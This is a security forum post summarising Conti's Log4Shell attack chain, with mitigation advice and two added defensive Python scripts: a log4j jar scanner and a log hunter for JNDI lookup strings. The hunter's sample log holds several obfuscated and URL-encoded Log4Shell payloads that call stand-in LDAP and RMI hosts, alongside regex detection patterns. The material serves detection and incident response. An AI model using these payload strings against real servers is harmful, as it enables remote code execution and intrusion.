Cyber Forum
Security
Active Exploits Discussion/Recommendations
Log4j Vulnerability Information
<blockquote data-quote="MJ Shoer" data-source="post: 2555" data-attributes="member: 3"><h3><span style="color: rgb(184, 49, 47)">Severity: High</span> <span style="color: rgb(0, 168, 133)">TLP: Green</span> Threat Actors Continue to Leverage Log4j</h3>
<p><strong>Tags</strong></p><ol> <li data-xf-list-type="ol"><strong>Critical CVE</strong></li> <li data-xf-list-type="ol"><strong>Cybercriminal Attack</strong></li> <li data-xf-list-type="ol"><strong>Nation State Attack</strong></li> <li data-xf-list-type="ol"><strong>Phishing Campaign</strong></li> <li data-xf-list-type="ol"><strong>Ransomware Attack</strong></li> </ol>
<p><strong>Conti Ransomware Gang Has Full Log4Shell Attack Chain</strong></p>
<p><strong>Summary:</strong></p>
<p>"The Conti ransomware gang, which became the first professional crimeware outfit to adopt and weaponize the Log4Shell vulnerability last week, has built up a holistic attack chain.</p>
<p>The sophisticated Russia-based Conti group – which Palo Alto Networks has called "one of the most ruthless" of dozens of ransomware groups currently known to be active – was in the right place at the right time with the right tools when Log4Shell hit the scene 10 days ago, security firm Advanced Intelligence (AdvIntel) said in a report shared with Threatpost on Thursday.</p>
<p>As of today, Monday, Dec. 20, the attack chain has taken the following form, AdvIntel's Yelisey Boguslavskiy told Threatpost: Emotet -> Cobalt Strike -> Human Exploitation -> (no ADMIN$ share) -> Kerberoast -> brute -> vCenter ESXi with log4j shell scan for vCenter" (<a href="https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/" target="_blank">ThreatPost, 2021</a>).</p>
<p><strong>Analyst Comments:</strong></p>
<p>The threat actors that fall under Conti's umbrella appear to be using various methods and tools to pivot to and from internal resources. They're using commodity tools and malware that have reportedly been used in attacks against multiple organizations and industries over the past few months.</p>
<p>Emotet was delivered via obfuscated fake installation packages, such as Adobe Reader, and disguised as legitimate .XLS files containing malicious macros. Actors are still using Cobalt Strike to access target systems and then leveraging Log4j vulnerabilities on devices attached to local network segments: "As of Wednesday, Dec. 15, Conti was looking for vulnerable VMware networks for initial access and lateral movement. The VMware servers are on a dismayingly long list of affected components and vendors whose products have been found to be vulnerable to Log4Shell" (<a href="https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/" target="_blank">ThreatPost, 2021</a>).</p>
<p>The motivation for obtaining initial access is high; threat actors know that there is likely an internal asset somewhere that may be running a vulnerable version of Log4j that could be leveraged to bypass any access control placed on mission-critical systems. If they can compromise or encrypt systems that contain crown jewels, which are often hypervisors, a payout is likely due to their efforts.</p>
<p><strong>Mitigation:</strong></p>
<p>On CISA's call yesterday, emphasis was placed on how companies should mitigate systems utilizing vulnerable instances of Log4j. It was recommended that organizations scan and mitigate assets directly exposed to the internet first and foremost and then move inward to ones located on internal network segments. If a vulnerable server was exposed to the internet at any point in time, assume compromise.</p>
<p><strong>Source:</strong></p>
<p><a href="https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/" target="_blank"><strong>https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/</strong></a></p></blockquote>
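To act on the "scan and mitigate" guidance in the post above, here is an added example (my own code, not the post's, ThreatPost's or AdvIntel's) that inventories log4j-core jars on a host, recursing into jars nested inside .war/.ear files, and classifies each as vulnerable, mitigated (JndiLookup.class stripped, the workaround Apache documented for versions that could not be upgraded) or patched (2.17.0+, 2.12.3+ or 2.3.1, per the Apache Log4j advisories). The fixture jars are constructed in a temporary directory and carry only the two entries the scanner keys on; the version thresholds are the only facts taken from outside the post.

```python
"""Inventory log4j-core jars under a directory and classify each one (added
example, not from the post).  Thresholds follow the Apache Log4j advisories for
CVE-2021-44228/45046/45105; the pre-patch workaround they document is removing
JndiLookup.class from the jar, which is also checked here."""
import io
import os
import re
import tempfile
import zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")

def parse_version(v: str) -> tuple:
    """'2.17.1' -> (2, 17, 1); '2.0-beta9' -> (2, 0, 0)."""
    nums = []
    for part in v.split(".")[:3]:
        m = re.match(r"\d+", part)
        nums.append(int(m.group()) if m else 0)
    return tuple(nums + [0] * (3 - len(nums)))

def classify(version: str, jndi_lookup: bool) -> str:
    """vulnerable | mitigated (JndiLookup.class stripped) | patched | unknown."""
    if version == "unknown":
        return "unknown" if jndi_lookup else "mitigated"
    v = parse_version(version)
    if (2, 3, 1) <= v < (2, 4, 0) or (2, 12, 3) <= v < (2, 13, 0) or v >= (2, 17, 0):
        return "patched"
    # 2.15.0/2.16.0 still ship JndiLookup.class and are still affected by
    # CVE-2021-45046 (2.15) and CVE-2021-45105 (both), so they are flagged too.
    return "vulnerable" if jndi_lookup else "mitigated"

def scan_archive(data: bytes, label: str, out: list) -> None:
    """Inspect one archive held in memory and recurse into nested archives
    (e.g. WEB-INF/lib/log4j-core-*.jar inside a .war).  Appends
    (label, version, jndi_lookup_present, status) tuples to `out`."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = set(zf.namelist())
    if POM_PROPS in names or JNDI_CLASS in names:
        version = "unknown"
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        present = JNDI_CLASS in names
        out.append((label, version, present, classify(version, present)))
    for name in names:
        if name.lower().endswith(ARCHIVE_EXT):
            scan_archive(zf.read(name), f"{label}!{name}", out)

def scan_tree(root: str) -> list:
    """Walk `root` and scan every archive; nested members get '!' labels."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, f)
                with open(path, "rb") as fh:
                    scan_archive(fh.read(), path, findings)
    return findings

def build_sample_tree(root: str) -> None:
    """Constructed fixtures, not real jars: minimal zips holding only the
    entries the scanner keys on (the 'class' is four placeholder bytes)."""
    def jar(version: str, with_jndi: bool) -> bytes:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as z:
            z.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
            if with_jndi:
                z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
        return buf.getvalue()

    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as z:   # patched jar nested inside a .war
        z.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", jar("2.17.1", True))
    os.makedirs(os.path.join(root, "lib"))
    for rel, data in {
        "lib/log4j-core-2.14.1.jar": jar("2.14.1", True),            # unpatched
        "lib/log4j-core-2.14.1-stripped.jar": jar("2.14.1", False),  # class removed
        "app.war": war.getvalue(),
    }.items():
        with open(os.path.join(root, *rel.split("/")), "wb") as fh:
            fh.write(data)

def demo() -> dict:
    """Scan the constructed tree; return {path relative to root: (version, status)}."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return {label[len(tmp):].replace(os.sep, "/"): (version, status)
                for label, version, _, status in scan_tree(tmp)}

if __name__ == "__main__":
    for path, (version, status) in sorted(demo().items()):
        print(f"{status:10} {version:8} {path}")
```

Point `scan_tree()` at application roots (Tomcat `webapps/`, vCenter's `/usr/lib/vmware-*`, any `lib/` directory) on the internet-facing hosts first, as the post recommends, then work inward. A "mitigated" result means the JNDI lookup class is gone but the version is still old; treat it as a stopgap and schedule the upgrade.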
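For the "assume compromise" part of the post's mitigation advice, here is an added example (my own code, not from the post or the sources it cites) that hunts web-server request logs for Log4Shell lookup strings, including the URL-encoded and obfuscated variants (`${${lower:j}ndi:...}`, `${::-j}`, `${env:X:-j}`, `${jndi:${lower:l}dap://...}`) that a literal `${jndi:` grep misses, and extracts the callback hosts so you can pivot into egress, proxy and DNS logs. The log lines are constructed and the addresses come from RFC 5737 documentation ranges; the lookup syntax being resolved is Log4j's own `${prefix:key:-default}` form.

```python
"""Hunt request logs for Log4Shell (CVE-2021-44228) lookup strings.

Added example, not from the post.  normalize() URL-decodes a line and then
collapses the Log4j lookups an attacker fully controls from the string itself
(${lower:..}, ${upper:..} and the ':-' default-value form) inside-out, so that
obfuscated payloads become the plain ${jndi:<scheme>://<host>...} form that
hunt() matches."""
import re
from urllib.parse import unquote

LOOKUP = re.compile(r"\$\{([^${}]*)\}")                        # innermost ${...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^/}\s]+)", re.I)

def _resolve(expr: str) -> str:
    """Resolve one innermost lookup body, or hand it back unchanged."""
    prefix, _, arg = expr.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "jndi":
        return "${" + expr + "}"           # this is what we are hunting for
    if ":-" in expr:                       # ${env:NOPE:-j} and ${::-j} -> "j"
        return expr.split(":-", 1)[1]
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    return "${" + expr + "}"               # ${date:..}, ${sys:..}: not ours to resolve

def normalize(s: str) -> str:
    """URL-decode (access logs hold the encoded form), then resolve lookups
    until nothing changes.  Every resolution shortens the string, so this ends."""
    s = unquote(unquote(s))
    while True:
        new = LOOKUP.sub(lambda m: _resolve(m.group(1)), s)
        if new == s:
            return s
        s = new

def hunt(lines) -> list:
    """One dict per JNDI lookup found: line number, scheme, callback, raw line."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in JNDI.finditer(normalize(line)):
            hits.append({"line": n, "scheme": m.group(1).lower(),
                         "callback": m.group(2), "raw": line.strip()})
    return hits

def callback_hosts(hits) -> list:
    """Unique callback hosts (port stripped) to block and to search egress logs for."""
    return sorted({h["callback"].rsplit(":", 1)[0] for h in hits})

# Constructed sample lines (not real traffic; RFC 5737 documentation addresses).
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:14:02:12 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fb%7D HTTP/1.1" 400 0 "-" "curl/7.79.1"',
    '203.0.113.6 - - [10/Dec/2021:14:05:40 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${${env:NOPE:-j}${::-n}di:${lower:L}DAP://198.51.100.8/c}"',
    '203.0.113.7 - - [10/Dec/2021:14:06:02 +0000] "GET /api HTTP/1.1" 200 88 "-" "${jndi:${upper:r}mi://198.51.100.9:1099/d}"',
    '198.51.100.20 - - [10/Dec/2021:14:07:00 +0000] "GET /health HTTP/1.1" 200 2 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [10/Dec/2021:14:08:00 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 2 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    found = hunt(SAMPLE_ACCESS_LOG)
    for h in found:
        print(f'line {h["line"]}: {h["scheme"]}://{h["callback"]}')
    print("callback hosts:", callback_hosts(found))
```

A hit only proves an attempt; the host is compromised if it resolved or connected to the callback, so take `callback_hosts()` to the firewall, proxy and DNS logs for the same window. Attackers also put the string in other logged fields (X-Forwarded-For, Referer, usernames), so feed `hunt()` any log the application writes, not just the access log.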